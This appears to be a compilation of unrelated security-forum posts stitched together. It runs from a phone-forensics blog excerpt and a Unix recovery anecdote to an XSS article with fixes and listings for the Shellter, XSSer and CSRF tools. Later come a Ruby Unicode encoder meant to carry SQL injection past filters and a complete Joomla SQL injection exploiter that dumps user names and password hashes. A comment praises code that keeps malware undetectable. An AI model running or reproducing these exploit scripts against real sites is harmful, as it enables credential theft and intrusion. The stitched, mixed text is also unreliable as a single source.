Note 1: Each "SMS" record contains a UTF-16-LE encoded string for "SMS".
Note 2: From both sets of test data, there seems to be a consistent number of bytes between:
- The FILETIMEX (in red) and "SMS" string (in kermit green) and
- The "SMS" string (in kermit green) and the Phone number string (in orange).

So, each sent "SMStext" FILETIME2 value (from Area 1) should have a corresponding match with an "SMS" record's FILETIMEX value (in Area 2). In this way, we can match a sent "SMStext" message with the destination phone number via the FILETIME2 value. Sounds a little crazy right? But the test data seems to confirm this.
Purrr! [h=4]Contacts[/h] Contact information is also located in "store.vol". There were 2 observed data structure types - both contained phone number and name information however, one data type had an extra 10 digit number string. It was later discovered via phone inspection that the records with the extra 10 digit strings corresponded with "Hotmail" address book entries. It would be interesting to see if the 10 digit number corresponded to a unique hotmail user ID of some kind. The second type of contacts structure was a "Phonebook" entry - presumably these contact types were entered into the phone by the user rather than slurped up from a Hotmail account. Common to both contact records were multiple occurrences of the same contact name and phone number. OCD phonebook, OCD phonebook, OCD phone book ... [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]"Hotmail" Contacts record (from "store.vol")[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]"Phonebook" Contacts record (from "store.vol")[/TD] [/TR] [/TABLE] Note 1: The flag value (in red) which can be used to determine if the contact record is a "Hotmail" or "Phonebook" entry. Note 2: The potential 6 byte magic number (0xFFFFFF2A2A00) for Contact records should make it easier to find each entry. This was discovered by Sharp-eyed Cindy on the last day (by which time monkey had lost the will to live). Note 3: The 10 digit string (in pink) could be a potential Hotmail ID. [h=4]MMS data[/h] Further research is required for MMS records (eg linking timestamps and phone numbers to sent files). But here's what we've learned so far ... 
Various .dat files containing MMS content (eg there was a .dat file containing a sent JPEG and another .dat file containing the accompanying text) are stored in: \SharedData\Comms\Unistore\data under 3 sub-directories: "0", "2" and "7". These folders might correspond to Sent, Received and Draft??? There were multiple .dat files with similar names each seemingly containing info for different parts of the same MMS. In "store.vol", there are records containing the UTF-16-LE encoded string for "MMS". These records also contain 3 filename strings and a filetype string (possibly the MIME type eg "image/jpeg"). From my jet-lagged memory, I want to say that the filename strings were pointing to the same filename and there were multiple "MMS" entries for a single MMS message (ie each MMS message has three separate files associated with it). But you should probably should check it out for yourself ... [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]MMS record (from "store.vol")[/TD] [/TR] [/TABLE] [h=4]Call log[/h] The Call log information is located in the "Phone" file. Each Call log record contains a flag (in blue) to mark whether a call record is Missed / Incoming / Outgoing. The flag values were confirmed via inspection of the phone and corresponding Call log record. There's also Start and Stop FILETIMEs, repeated contact names and repeated phone numbers. Of potential interest is a 10 digit ASCII encoded string (in grey) and what looks to be a GUID (in light purple). Each call record had the same GUID string value enclosed by "{}". Perhaps this GUID represents the phone device or the calling application??? I wonder if it would be consistent between different model phones... 
[TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Call log record (from "Phone")[/TD] [/TR] [/TABLE] [h=3]Summary[/h] So there you have it - we started off knowing very little about Windows Phone 8.0 data storage and now we know a considerable amount more especially regarding SMS records. Due to time constraints, it was not possible to investigate the non-SMS related data areas (ie MMS, Call log, Contacts) with the same level of detail. However, it's probably better to share what we've discovered now as I don't know when I'll be able to perform further research. The observations in this post may not be consistent for Windows 8.1 and/or on other models of Windows phones but hopefully this post can still serve as a starting point. As always, check that the underlying data matches your expectations! It was really awesome having someone else to bounce ideas off when hex-diving. I'm pretty sure I would have missed some important details (eg the FILETIME timestamp) had it not been for another set of eyes. Of course, that's not always going to be possible so I also appreciated the other opportunities to work automonously / with minimal supervision. Someday monkey might have to do this on his lonesome! Initially, it was easy to tie my idea of success with the "I have to code a solution for every scenario/data set". It would have been awesome if I could have done that but the fact was - we didn't have any SMS messages from "store.vol" at the start and after running the one-off SMS script, we had 5000+ messages sorted in chronological order with their associated phone numbers. Success doesn't have to be black and white. It sounds cliche but focusing on little wins each day made it easier to start eating the metaphorical elephant. Now please excuse me, while I adjust my pants ... 
Posted by Cheeky4n6Monkey at 14:35

Source: Cheeky4n6Monkey - Learning About Digital Forensics: Monkeying around with Windows Phone 8.0
-
Shellter v1.0

Index
=======
[1] What is it?
[2] How does it work?
[3] What does it trace?
[4] Why do I need Shellter?
[5] What types of apps can I use?
[6] Can I use encoded/self-decrypting payloads?
[7] What about self-modifying code?
[8] What about relocations?
[9] What about Multi-Thread Applications?
[10] What about Anti-Reversing tricks?
[11] What if the target process dies during tracing?
[12] What if an internal engine related error occurs?
[13] How do execution flow filters work?
[14] How much time does it need for tracing and log filtering?
[15] What options does Shellter provide?
[16] System Requirements
[17] What should I do if I want to send feedback?
[18] What should I do if I want to report a bug?
[19] What should I do if I don't like it?

Readme: https://www.shellterproject.com/Downloads/Shellter/Readme.txt

Source: https://www.shellterproject.com/download/
-
OHM2013: RAM Memory acquisition using live-BIOS modification
Nytro posted a topic in Tutoriale video
[h=1]OHM2013: RAM Memory acquisition using live-BIOS modification[/h] -
*THE* classic Unix horror story Tue, 01/31/2006 - 10:11am — binford2k Try this in windows! Unix Recovery Legend This classic article from Mario Wolczko first appeared on Usenet in 1986. Have you ever left your terminal logged in, only to find when you came back to it that a (supposed) friend had typed "rm -rf ~/*" and was hovering over the keyboard with threats along the lines of "lend me a fiver 'til Thursday, or I hit return"? Undoubtedly the person in question would not have had the nerve to inflict such a trauma upon you, and was doing it in jest. So you've probably never experienced the worst of such disasters.... It was a quiet Wednesday afternoon. Wednesday, 1st October, 15:15 BST, to be precise, when Peter, an office-mate of mine, leaned away from his terminal and said to me, "Mario, I'm having a little trouble sending mail." Knowing that msg was capable of confusing even the most capable of people, I sauntered over to his terminal to see what was wrong. A strange error message of the form (I forget the exact details) "cannot access /foo/bar for userid 147" had been issued by msg. My first thought was "Who's userid 147?; the sender of the message, the destination, or what?" So I leant over to another terminal, already logged in, and typed grep 147 /etc/passwd only to receive the response /etc/passwd: No such file or directory. Instantly, I guessed that something was amiss. This was confirmed when in response to ls /etc I got ls: not found. I suggested to Peter that it would be a good idea not to try anything for a while, and went off to find our system manager. When I arrived at his office, his door was ajar, and within ten seconds I realised what the problem was. James, our manager, was sat down, head in hands, hands between knees, as one whose world has just come to an end. Our newly-appointed system programmer, Neil, was beside him, gazing listlessly at the screen of his terminal. 
And at the top of the screen I spied the following lines:

# cd
# rm -rf *

Oh, shit, I thought. That would just about explain it. I can't remember what happened in the succeeding minutes; my memory is just a blur. I do remember trying ls (again), ps, who and maybe a few other commands beside, all to no avail. The next thing I remember was being at my terminal again (a multi-window graphics terminal), and typing

cd /
echo *

I owe a debt of thanks to David Korn for making echo a built-in of his shell; needless to say, /bin, together with /bin/echo, had been deleted. What transpired in the next few minutes was that /dev, /etc and /lib had also gone in their entirety; fortunately Neil had interrupted rm while it was somewhere down below /news, and /tmp, /usr and /users were all untouched. Meanwhile James had made for our tape cupboard and had retrieved what claimed to be a dump tape of the root filesystem, taken four weeks earlier. The pressing question was, "How do we recover the contents of the tape?". Not only had we lost /etc/restore, but all of the device entries for the tape deck had vanished. And where does mknod live? You guessed it, /etc. How about recovery across Ethernet of any of this from another VAX? Well, /bin/tar had gone, and thoughtfully the Berkeley people had put rcp in /bin in the 4.3 distribution. What's more, none of the Ether stuff wanted to know[work?] without /etc/hosts at least. We found a version of cpio in /usr/local, but that was unlikely to do us any good without a tape deck. Alternatively, we could get the boot tape out and rebuild the root filesystem, but neither James nor Neil had done that before, and we weren't sure that the first thing to happen would be that the whole disk would be re-formatted, losing all our user files. (We take dumps of the user files every Thursday; by Murphy's Law this had to happen on a Wednesday).
Another solution might be to borrow a disk from another VAX, boot off that, and tidy up later, but that would have entailed calling the DEC engineer out, at the very least. We had a number of users in the final throes of writing up PhD theses and the loss of a maybe a weeks' work (not to mention the machine down time) was unthinkable. So, what to do? The next idea was to write a program to make a device descriptor for the tape deck, but we all know where cc, as and ld live. Or maybe make skeletal entries for /etc/passwd, /etc/hosts and so on, so that /usr/bin/ftp would work. By sheer luck, I had a gnuemacs still running in one of my windows, which we could use to create passwd, etc., but the first step was to create a directory to put them in. Of course /bin/mkdir had gone, and so had /bin/mv, so we couldn't rename /tmp to /etc. However, this looked like a reasonable line of attack. By now we had been joined by Alasdair, our resident UNIX guru, and as luck would have it, someone who knows VAX assembler. So our plan became this: write a program in assembler which would either rename /tmp to /etc, or make /etc, assemble it on another VAX, uuencode it, type in the uuencoded file using my gnu, uudecode it (some bright spark had thought to put uudecode in /usr/bin), run it, and hey presto, it would all be plain sailing from there. By yet another miracle of good fortune, the terminal from which the damage had been done was still su'd to root (su is in /bin, remember?), so at least we stood a chance of all this working. Off we set on our merry way, and within only an hour we had managed to concoct the dozen or so lines of assembler to create /etc. The stripped binary was only 76 bytes long, so we converted it to hex (slightly more readable than the output of uuencode), and typed it in using my editor. 
If any of you ever have the same problem, here's the hex for future reference:

070100002c000000000000000000000000000000000000000000000000000000
0000dd8fff010000dd8f27000000fb02ef07000000fb01ef070000000000bc8f
8800040000bc012f65746300

I had a handy program around (doesn't everybody?) for converting ASCII hex to binary, and the output of /usr/bin/sum tallied with our original binary. But hang on---how do you set execute permission without /bin/chmod? A few seconds thought (which as usual, lasted a couple of minutes) suggested that we write the binary on top of an already existing binary, owned by me...problem solved. So along we trotted to the terminal with the root login, carefully remembered to set the umask to 0 (so that I could create files in it using my gnu), and ran the binary. So now we had a /etc, writable by all. From there it was but a few easy steps to creating passwd, hosts, services, protocols, (etc), and then ftp was willing to play ball. Then we recovered the contents of /bin across the ether (it's amazing how much you come to miss ls after just a few, short hours), and selected files from /etc. The key file was /etc/rrestore, with which we recovered /dev from the dump tape, and the rest is history. Now, you're asking yourself (as I am), what's the moral of this story? Well, for one thing, you must always remember the immortal words, DON'T PANIC. Our initial reaction was to reboot the machine and try everything as single user, but it's unlikely it would have come up without /etc/init and /bin/sh. Rational thought saved us from this one. The next thing to remember is that UNIX tools really can be put to unusual purposes. Even without my gnuemacs, we could have survived by using, say, /usr/bin/grep as a substitute for /bin/cat. And the final thing is, it's amazing how much of the system you can delete without it falling apart completely.
Apart from the fact that nobody could login (/bin/login?), and most of the useful commands had gone, everything else seemed normal. Of course, some things can't stand life without say /etc/termcap, or /dev/kmem, or /etc/utmp, but by and large it all hangs together. I shall leave you with this question: if you were placed in the same situation, and had the presence of mind that always comes with hindsight, could you have got out of it in a simpler or easier way? Answers on a postage stamp to:

Mario Wolczko
------------------------------------------------------------------------
Dept. of Computer Science   ARPA:   miw%uk.ac.man.cs.ux@cs.ucl.ac.uk
The University              USENET: mcvax!ukc!man.cs.ux!miw
Manchester M13 9PL          JANET:  miw@uk.ac.man.cs.ux
U.K.                        061-273 7121 x 5699
------------------------------------------------------------------------

Hacker's Wisdom: Unix Recovery Legend
Last modified: Thu Mar 7 13:47:40 EST 1996
http://www.ee.ryerson.ca:8080/~elf/hack/recovery.html

Source: *THE* classic Unix horror story | WSU Linux Users Group
-
Acceptable
-
A XSS Vulnerability in Almost Every PHP Form I’ve Ever Written
Nytro replied to Nytro's topic in Tutoriale in engleza
Fuck http://127.0.0.1/test.php/"><script>alert(1)</script> -
[h=2]A XSS Vulnerability in Almost Every PHP Form I’ve Ever Written[/h]

I've spent a lot of time over the past few months writing an enterprise application in PHP. Despite what some people may say, I believe that PHP is as secure or insecure as the developer who is writing the code. Anyway, I'm at the point in my development lifecycle where I decided that it was ready to run an application vulnerability scanner against it. What I found was interesting and I think it's worth sharing with you all.

Let me preface this by saying that I'm the guy who gives the training to our developers on the OWASP Top 10, writing secure code, etc. I'd like to think that I have a pretty good handle on programming best practices, input validation, and HTML encoding. I built all kinds of validation into this application and thought that the vulnerability scan would come up empty. For the most part I was right, but there was one vulnerability, one flaw in particular, that found its way into every form in my application. In fact, I realized that I've made this exact same mistake in almost every PHP form that I've ever written. Talk about a humbling experience.

So here's what happened. I created a simple page with a form where the results of that form are submitted back to the page itself for processing. Let's assume it looks something like this:

<html>
<body>
<?php
if (isset($_REQUEST['submitted']) && $_REQUEST['submitted'] == '1') {
    echo "Form submitted!";
}
?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>">
<input type="hidden" name="submitted" value="1" />
<input type="submit" value="Submit!" />
</form>
</body>
</html>

It looks fairly straightforward, right? The problem has to do with that $_SERVER['PHP_SELF'] variable. The intent here is that PHP will display the path and name of the current page so that the form knows to submit back to the same page. The problem is that $_SERVER['PHP_SELF'] can actually be manipulated by the user.
Let's say as the user I change the URL from

http://www.webadminblog.com/example.php

to

http://www.webadminblog.com/example.php"><script>alert('xss');</script>

This will end the form action part of the code and inject a javascript alert into the page. This is the very definition of cross site scripting. I can't believe that with as long as I've been writing in PHP and as long as I've been studying application security, I've never realized this.

Fortunately, there are a couple of different ways to fix this. First, you could use the HTML entities or HTML special character functions to sanitize the user input like this:

htmlentities($_SERVER['PHP_SELF']);
htmlspecialchars($_SERVER['PHP_SELF']);

This fix would still allow the user to manipulate the URL, and thus, what is displayed on the page, but it would render the javascript invalid. The second way to fix this is to use the script name variable instead like this:

$_SERVER['SCRIPT_NAME'];

This fix would just echo the full path and filename of the current file. Yes, there are other ways to fix this. Yes, my code example above for the XSS exploit doesn't do anything other than display a javascript alert. I just wanted to draw attention to this issue because if it's found its way into my code, then perhaps it's found its way into yours as well. Happy coding!

Source: A XSS Vulnerability in Almost Every PHP Form I’ve Ever Written | Web Admin Blog

Note: It doesn't seem to work, for obvious reasons: The requested URL /test.php"><script>alert(1)</script> was not found on this server. Does it work for you?
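As an added example (not the article's or the blog's own code), here is the unsafe form from the post next to the two fixes it recommends, with a small self-check; the $_SERVER entries, the function names and the payload value are constructed so the script runs from the PHP CLI without a web server.

```php
<?php
// Added example, not the article's code. $_SERVER values are constructed so
// this runs from the CLI; in a real request the web server fills them in.
// PHP_SELF reflects the path the client requested, PATH_INFO included, which is
// why a request for /example.php/"><script>...</script> lands inside the
// action attribute when it is echoed unescaped (the page's own finding).
$_SERVER['PHP_SELF']    = '/example.php/"><script>alert(1)</script>';  // client-controlled
$_SERVER['SCRIPT_NAME'] = '/example.php';                                // set by the server

// Vulnerable: raw PHP_SELF interpolated into an HTML attribute.
function vulnerable_form(): string {
    return '<form action="' . $_SERVER['PHP_SELF'] . '" method="post">'
         . '<input type="hidden" name="submitted" value="1" /></form>';
}

// Fix 1: escape for an attribute context. ENT_QUOTES neutralises both quote
// characters and an explicit charset avoids encoding surprises.
function escaped_form(): string {
    $action = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $action . '" method="post">'
         . '<input type="hidden" name="submitted" value="1" /></form>';
}

// Fix 2: SCRIPT_NAME is the server-side path of the executing script and, on a
// correctly configured server, carries no client-supplied PATH_INFO. It is
// still escaped here: output encoding should not depend on the source.
function scriptname_form(): string {
    $action = htmlspecialchars($_SERVER['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $action . '" method="post">'
         . '<input type="hidden" name="submitted" value="1" /></form>';
}

// Crude regression check a developer can keep next to the template: a literal
// <script tag in the rendered markup means the attribute context was broken.
function contains_raw_script(string $html): bool {
    return stripos($html, '<script') !== false;
}

foreach (['vulnerable' => vulnerable_form(),
          'escaped'    => escaped_form(),
          'scriptname' => scriptname_form()] as $label => $html) {
    printf("%-10s %s\n  %s\n", $label,
           contains_raw_script($html) ? 'INJECTED' : 'safe', $html);
}
```

Only the first line reports INJECTED; the escaped variant still shows the tampered path, as the article says, but as &quot;&gt;&lt;script&gt; text rather than markup.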
-
Let's tag: @jetu ? PS: Those "useless" lines of code are probably there so that the executable stays FUD.
-
[h=2]BlindElephant Web Application Fingerprinter[/h]

The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.

Sourceforge Project Page: https://sourceforge.net/projects/blindelephant/
Discussion and Forums: http://www.qualys.com/blindelephant
License: LGPL

[h=3]Getting Started[/h]

BlindElephant can be used directly as a tool on the command line, or as a library to provide fingerprinting functionality to another program.

[h=4]Pre-requisites:[/h]

Python 2.6.x (prefer 2.6.5); users of earlier versions may have difficulty installing or running BlindElephant.

[h=4]Get the code:[/h]

Browse SVN
Checkout via SVN: svn co https://blindelephant.svn.sourceforge.net/svnroot/blindelephant/trunk blindelephant

Download: BlindElephant Web Application Fingerprinter
-
[h=1]Introduction[/h]

Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. It contains several options to try to bypass certain filters, and various special techniques of code injection.

[h=1]Current version[/h]

XSSer v1.6b ("The Mosquito: Grey Swarm!").

Download original source code: XSSer v1.6 -beta-
Ubuntu/Debian package: XSSer-1.6_all.deb
ArchLinux package: AUR link (v1.6b)
Gentoo package: XSSer Gentoo ebuild (v1.6b)
RPM package: XSSer-1.6-1.noarch.rpm

Or update your copy directly from the XSSer -Subversion- repository:

$ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser

This version includes more features on the GTK+ interface:

[Images: XSSer GTK+ interface screenshots]

TIP: type 'xsser --gtk' to start from shell. Or run XSSer directly from the menu.

Download: XSSer: automatic tool for pentesting XSS attacks against different applications
-
pinata-csrf-tool

Pinata is a Python Script that will generate Proof of Concept CSRF HTML from HTTP request.

[h=2]Overview:[/h]
- WARNING - THIS IS NOT A POINT AND CLICK TOOL. YOU SHOULD KNOW WHAT YOU ARE DOING TO USE THIS TOOL.
- The tool will generate proof of concept CSRF HTML given an HTTP request. It will automatically check whether it is a GET or a POST request and with further validation for standard POST and Multipart/form POST.
- The tool will then create an HTML corresponding to the type of the request.
- The GET CSRF HTML includes IMG tag with SRC set to the URL being tested.
- The POST CSRF HTML is created with auto submit JavaScript form with names and values from the HTTP request.

Download: https://code.google.com/p/pinata-csrf-tool/
-
# Ruby Script to generate URL encoded Unicode UTF-8 URL.
# Author: Gary O'leary-Steele of Sec-1 Ltd
# Example:
# The string ' or 1 in (@@version)-- is encoded as and work for the same SQL injection attack
# %u02b9%u0020%uff4f%uff52%u0020%uff11%u0020%uff49%uff4e%u0020%uff08%u0040%u0040%uff56%uff45%uff52%uff53%uff49%uff4f%uff4e%uff09%uff0d%uff0d
#
#
require 'erb'

def unicode_url(string)
  # Map each ASCII character to a %uXXXX escape of a look-alike Unicode
  # character (mostly the fullwidth forms, U+FF01..U+FF5E).
  lookuptable = {
    ' ' => '%u0020', '/' => '%u2215', '\\' => '%u2215', "'" => '%u02b9',
    '"' => '%u0022', '>' => '%u003e', '<' => '%u003c', '#' => '%uff03',
    '!' => '%uff01', '$' => '%uff04', '*' => '%uff0a', '@' => '%u0040',
    '.' => '%uff0e', '_' => '%uff3f', '(' => '%uff08', ')' => '%uff09',
    ',' => '%uff0c', '%' => '%u0025', '-' => '%uff0d', ';' => '%uff1b',
    ':' => '%uff1a', '|' => '%uff5c', '&' => '%uff06', '+' => '%uff0b',
    '=' => '%uff1d',
    'a' => '%uff41', 'A' => '%uff21', 'b' => '%uff42', 'B' => '%uff22',
    'c' => '%uff43', 'C' => '%uff23', 'd' => '%uff44', 'D' => '%uff24',
    'e' => '%uff45', 'E' => '%uff25', 'f' => '%uff46', 'F' => '%uff26',
    'g' => '%uff47', 'G' => '%uff27', 'h' => '%uff48', 'H' => '%uff28',
    'i' => '%uff49', 'I' => '%uff29', 'j' => '%uff4a', 'J' => '%uff2a',
    'k' => '%uff4b', 'K' => '%uff2b', 'l' => '%uff4c', 'L' => '%uff2c',
    'm' => '%uff4d', 'M' => '%uff2d', 'n' => '%uff4e', 'N' => '%uff2e',
    'o' => '%uff4f', 'O' => '%uff2f', 'p' => '%uff50', 'P' => '%uff30',
    'q' => '%uff51', 'Q' => '%uff31', 'r' => '%uff52', 'R' => '%uff32',
    's' => '%uff53', 'S' => '%uff33', 't' => '%uff54', 'T' => '%uff34',
    'u' => '%uff55', 'U' => '%uff35', 'v' => '%uff56', 'V' => '%uff36',
    'w' => '%uff57', 'W' => '%uff37', 'x' => '%uff58', 'X' => '%uff38',
    'y' => '%uff59', 'Y' => '%uff39', 'z' => '%uff5a', 'Z' => '%uff3a',
    '0' => '%uff10', '1' => '%uff11', '2' => '%uff12', '3' => '%uff13',
    '4' => '%uff14', '5' => '%uff15', '6' => '%uff16', '7' => '%uff17',
    '8' => '%uff18', '9' => '%uff19'
  }

  # Convert string to array of chars (the /./ pattern drops the trailing newline from gets)
  chararray = string.scan(/./)
  newstr = String.new
  chararray.each do |c|
    if lookuptable.has_key? c
      newstr = newstr + lookuptable[c]
    else
      # Original used URI.escape, which was removed in Ruby 3;
      # ERB::Util.url_encode percent-encodes anything not in the table.
      newstr = newstr + ERB::Util.url_encode(c)
    end
  end
  return newstr
end

print "Enter string to URL Unicode:"
puts unicode_url(gets)

Download: unicode-fun.txt - Packet Storm
-
Joomla SQL Injection Exploiter

#!/usr/bin/python
# Automated Joomla SQL Injection Exploiter
# by Valentin Hoebel (valentin@xenuser.org)
# Version 1.0 (23th May 2010)
#
# This tool is based on my column fuzzer
# ASCII FOR BREAKFAST
#
#
# About the tool
# ----------------------------------------------------------------------------------
# Features:
#- Check if URL is reachable
#- Fuzz amount of columns (needed for UNION SELECT attack)
#- Show a sample exploitation URL for pasting into the browser
#- Showing the Joomla users from the table jos_users (with password hashes)
#- Display current database, db user and db version
# The Automated Joomla SQL Injection Exploiter is able to
# exploit most of the SQL injection vulnerabilities which were ever
# fdiscovered for Joomla or it's components, modules and plugins.
# Simply hand over a vulnerable URL to this tool and receive the
# admin login data of the vulnerable Joomla installation.
#
# With this tool it is no longer necessary to write new exploits for new
# Joomla (components/modules/plugins) vulnerabilities!
# Usage example:
# python joomla_sqli_sploiter.py - u "http://target/index.php?option=com_component?id=1"
# The tool tries to exploit SQL injection vulnerabilities by using UNION SELECT. Therefore
# it is necessary to fuzz the number of columns.
# If this is successfull, the tool crafts a SQL injection URL for reading out the Joomla user table.
#
# Since most of the stuff is dynamic this tool can be enhanced easely to do also other things.
# Feel free to use, modify, distribute and share this code as you like! Power to teh cows!
# This tool war written for educational purposes only. I am not responsible for any damage
# you might cause using this tool. Know and respect your local laws!
# Only use this tool on websites you are allowed to test
# Greetz && THX
# ----------------------------------------------------------------------------------
# Special greetings to cr4wl3r (you know why !)
# Greetz && THX to: inj3ct0r, Exploit DB team, hack0wn (especially to /JosS) and the Packet Storm staff!
# Thanks osvdb staff + moderators for your daily work! There are many people who appreciate what you are doing!
#
# Power to the cows!

# Python 2 script (print statements, urllib2)
import sys, re, urllib, urllib2, string
from urllib2 import Request, urlopen, URLError, HTTPError

# Define the max. amounts for trying
max_columns = 100


# Prints usage
def print_usage():
    print ""
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    print ""
    print " Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)"
    print " by Valentin Hoebel (valentin@xenuser.org)"
    print ""
    print " Exploits almost every SQL injection vulnerability which was ever discovered"
    print " for Joomla and it's components/modules/plugins. It works also for feature(new)"
    print " vulnerabilities, so no new exploits are needed!"
    print ""
    print " Simply give this tool the vulnerable URL and receive the Joomla user table!"
    print ""
    print " Usage:"
    print " -u <URL> (e.g. -u \"http://target/index.php?option=com_vulnerable&katid=1\")"
    print " --help (displays this text)"
    print ""
    print ""
    print " Features:"
    print " - Check if URL is reachable"
    print " - Fuzz amount of columns (needed for UNION SELECT attack)"
    print " - Show a sample exploitation URL for pasting into the browser"
    print " - Showing the Joomla users from the table jos_users (with password hashes)"
    print " - Display current database, db user and db version"
    print ""
    print " For educational purposes only! I am not responsible if you cause any damage!"
    print " Only use this tool on websites which you may test, e.g. for penetration testing."
    print ""
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    print ""
    print ""
    return


# Prints banner
def print_banner():
    print ""
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    print ""
    print " Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)"
    print " by Valentin Hoebel (valentin@xenuser.org)"
    print ""
    print " For educational purposes only! I am not responsible if you cause any damage!"
    print " Only use this tool on websites which you may test, e.g. for penetration testing."
    print ""
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    print ""
    return


# Testing if URL is reachable, with error handling
def test_url():
    print ">> Checking if connection can be established..."
    try:
        response = urllib2.urlopen(provided_url)
    except HTTPError, e:
        print ">> The connection could not be established."
        print ">> Error code: ", e.code
        print ">> Exiting now!"
        print ""
        sys.exit(1)
    except URLError, e:
        print ">> The connection could not be established."
        print ">> Reason: ", e.reason
        print ">> Exiting now!"
        print ""
        sys.exit(1)
    else:
        valid_target = 1
        print ">> Connected to target! URL seems to be valid."
        print ""
    return


# Find correct amount of columns for the SQL Injection and enhance with Joomla exploitation capabilities
def find_columns():
    # Define some important variables and make the script a little bit dynamic
    number_of_columns = 1
    column_finder_url_string = "+AND+1=2+UNION+SELECT+"
    column_finder_url_message = "0x503077337220743020743368206330777321"
    column_finder_url_message_plain = "P0w3r t0 t3h c0ws!"
    column_finder_url_terminator = "+from+jos_users--"
    column_finder_url_terminator_2 = "--"
    next_column = ","
    column_finder_url_sample_2 = "concat_ws(0x3b,user(),database(),version())"
    column_finder_url_sample_3 = "concat_ws(0x3b,0x503077337220743020743368206330777321,user(),database(),version(),0x503077337220743020743368206330777321)"
    column_finder_url_sample = "concat_ws(0x3b,0x503077337220743020743368206330777321,id,name,username,password,email,usertype,0x503077337220743020743368206330777321)"

    # Craft the final URL to check
    final_check_url = provided_url + column_finder_url_string + column_finder_url_message

    print ">> Assuming that your provided URL is vulnerable."
    print ">> Trying to find the correct number of columns... (this may take a while)"

    for x in xrange(1, max_columns):
        # Visit website and store response source code of site
        final_check_url2 = final_check_url + column_finder_url_terminator
        response = urllib2.urlopen(final_check_url2)
        html = response.read()
        find_our_injected_string = re.findall(column_finder_url_message_plain, html)

        # When the correct amount was found we display the information and exit
        if len(find_our_injected_string) != 0:
            print ">> Correct number of columns found!"
            print ">> Amount: ", number_of_columns

            # Offer to display a sample exploitation URL for pasting into the browser
            print ""
            user_reply = str(raw_input(">> Do you want to have a sample exploitation URL for pasting into the browser? (Yes/No) "))
            if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
                # Print a sample URL for exploiting and replace test string with some useful stuff
                print ""
                final_check_url3 = final_check_url + column_finder_url_terminator_2
                print string.replace(final_check_url3, column_finder_url_message, column_finder_url_sample_2)
                print ""
                print ">> Simply copy and paste this link into your browser Moving on..."
            else:
                print ">> Viewing a sample exploitation URL was skipped!"

            # Craft our exploit query
            malicious_query = string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample)
            print ""
            print ">> Now assuming that this is a Joomla installation."
            print ">> Trying to fetch the first user of the Joomla user table..."

            # Receive the first user of the Joomla user table
            response = urllib2.urlopen(malicious_query)
            html = response.read()
            get_secret_data = string.find(html, "P0w3r t0 t3h c0ws!")
            get_secret_data += 18
            new_html = html[get_secret_data:]
            new_get_secret_data = string.find(new_html, "P0w3r t0 t3h c0ws!")
            new_html_2 = new_html[:new_get_secret_data]

            # Data was received, now format and display it
            formatted_output = str.split(new_html_2, ";")
            print "ID: ", formatted_output[1:2]
            print "Name: ", formatted_output[2:3], "Username: ", formatted_output[3:4]
            print "Password Hash: ", formatted_output[4:5]
            print "E-Mail Address: ", formatted_output[5:6], "User status: ", formatted_output[6:7]

            # Offer to display all entries of the Joomla user table
            print ""
            user_reply = str(raw_input(">> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) "))
            if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
                print ""
                print "-------------------------------------------------------------"
                print str.split(new_html, ";")
                print "-------------------------------------------------------------"
                print "The seperator for the single entries is: ", column_finder_url_message_plain
                print "So it is this pattern: seperator id;name;username;password;email address;user status seperator"
                print "I know, formatting is bad, but this will be improved soon."
            else:
                print ">> Viewing the Joomla user table output was skipped!"

            # Offer to display current database, user and MySQL version
            print ""
            user_reply = str(raw_input(">> Do you want to display the current database, database user and MySQL version? (Yes/No) "))
            if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
                # Crafting the final URL
                final_check_url4 = final_check_url + column_finder_url_terminator_2
                informative_query = string.replace(final_check_url4, column_finder_url_message, column_finder_url_sample_3)

                # Getting the data
                response4 = urllib2.urlopen(informative_query)
                html4 = response4.read()

                # Now extract the interesting information
                get_secret_data = string.find(html4, "P0w3r t0 t3h c0ws!")
                get_secret_data += 18
                new_html4 = html4[get_secret_data:]
                new_get_secret_data4 = string.find(new_html4, "P0w3r t0 t3h c0ws!")
                new_html_5 = new_html4[:new_get_secret_data4]

                # Data was received, now format and display it
                formatted_output = str.split(new_html_5, ";")
                print "MySQL Database User: ", formatted_output[1:2]
                print "MySQL Database: ", formatted_output[2:3]
                print "MySQL Version: ", formatted_output[3:4]
                print "That's it. Bye!"
                print ""
                print ""
                sys.exit(1)
            else:
                print ">> Viewing the informative data was skipped!"
                print "That's it. Bye!"
                print ""
                print ""
                sys.exit(1)

        # Increment counter var by one
        number_of_columns += 1

        # Add a new column to the URL
        final_check_url += next_column
